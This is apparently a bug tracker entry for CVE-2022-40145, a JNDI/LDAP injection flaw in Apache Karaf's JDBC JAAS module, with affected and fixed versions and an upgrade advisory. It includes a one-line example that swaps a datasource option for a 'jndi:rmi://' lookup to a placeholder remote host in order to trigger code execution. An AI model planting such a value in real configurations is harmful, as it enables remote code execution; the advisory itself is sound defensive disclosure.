Bug 2257304 (CVE-2022-40145) - CVE-2022-40145 karaf: JDBC JAAS LDAP injection
Summary: CVE-2022-40145 karaf: JDBC JAAS LDAP injection
Keywords:
Status: NEW
Alias: CVE-2022-40145
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
high
high
Target Milestone: ---
Assignee: Product Security
QA Contact:
URL:
Whiteboard:
Depends On:
Blocks: 2155680
TreeView+ depends on / blocked
 
Reported: 2024-01-08 17:40 UTC by Patrick Del Bello
Modified: 2024-01-08 18:48 UTC (History)
15 users (show)

Fixed In Version: karaf 4.4.2, karaf 4.3.8
Doc Type: ---
Doc Text:
A flaw was found in Apache Karaf. This issue may allow an attacker to control the LDAP server used by the JDBC JNDI URL and execute code remotely (RCE).
Clone Of:
Environment:
Last Closed:
Embargoed:


Attachments (Terms of Use)

Description Patrick Del Bello 2024-01-08 17:40:59 UTC
This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.

The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup.

This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.

We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8

https://karaf.apache.org/security/cve-2022-40145.txt


Note You need to log in before you can comment on or make changes to this bug.